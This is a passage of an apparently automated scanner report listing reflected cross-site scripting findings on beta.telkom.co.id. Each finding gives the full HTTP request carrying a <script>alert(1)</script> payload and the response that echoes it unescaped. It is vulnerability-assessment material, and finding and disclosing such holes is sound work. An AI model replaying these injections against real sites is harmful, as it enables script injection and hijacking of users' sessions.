<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media9913e<script>alert(1)</script>9c313f8dfec/siaran-pers/index.html</b>
...[SNIP]...
4.46. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a2ef"><script>alert(1)</script>5b76f035ef7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers8a2ef"><script>alert(1)</script>5b76f035ef7/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:25 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23740
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers8a2ef"><script>alert(1)</script>5b76f035ef7/index.html?&lid=en">
...[SNIP]...
4.47. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 53986--><script>alert(1)</script>5b54334d4b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/siaran-pers53986--><script>alert(1)</script>5b54334d4b6/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:36 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23743
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers53986--><script>alert(1)</script>5b54334d4b6/index.html?&lid=en">
...[SNIP]...
4.48. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fb16<script>alert(1)</script>0b2f2e242ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers4fb16<script>alert(1)</script>0b2f2e242ba/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:29 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23734
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/siaran-pers4fb16<script>alert(1)</script>0b2f2e242ba/index.html</b>
...[SNIP]...
4.49. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98720<script>alert(1)</script>2a336272d34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media98720<script>alert(1)</script>2a336272d34/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:25:12 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23932
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media98720<script>alert(1)</script>2a336272d34/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html</b>
...[SNIP]...
4.50. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e15"><script>alert(1)</script>5434cc3c433 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media49e15"><script>alert(1)</script>5434cc3c433/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:25:08 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23938
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media49e15"><script>alert(1)</script>5434cc3c433/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...
4.51. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f0dd1--><script>alert(1)</script>b1410b8d68d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-mediaf0dd1--><script>alert(1)</script>b1410b8d68d/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:25:18 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23941
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediaf0dd1--><script>alert(1)</script>b1410b8d68d/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...
4.52. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16605"><script>alert(1)</script>a086d335dd8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers16605"><script>alert(1)</script>a086d335dd8/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:43 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23938
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers16605"><script>alert(1)</script>a086d335dd8/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...
4.53. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 163d6--><script>alert(1)</script>5cd1b62ae23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/siaran-pers163d6--><script>alert(1)</script>5cd1b62ae23/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:53 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23941
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers163d6--><script>alert(1)</script>5cd1b62ae23/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...
4.54. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83abb<script>alert(1)</script>62ed3c32c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers83abb<script>alert(1)</script>62ed3c32c4/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:48 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23929
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/siaran-pers83abb<script>alert(1)</script>62ed3c32c4/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html</b>
...[SNIP]...
4.55. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 437c2--><script>alert(1)</script>512b27f7612 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products-services437c2--><script>alert(1)</script>512b27f7612/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:12 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23330
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<a href="/products-services437c2--><script>alert(1)</script>512b27f7612/index.html?&lid=id" class="blue">
...[SNIP]...
4.56. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1fda<script>alert(1)</script>2b730265f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesb1fda<script>alert(1)</script>2b730265f9d/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:06 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23321
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<b>/products-servicesb1fda<script>alert(1)</script>2b730265f9d/index.html</b>
...[SNIP]...
4.57. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae525"><script>alert(1)</script>66dba90169e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesae525"><script>alert(1)</script>66dba90169e/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:02 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
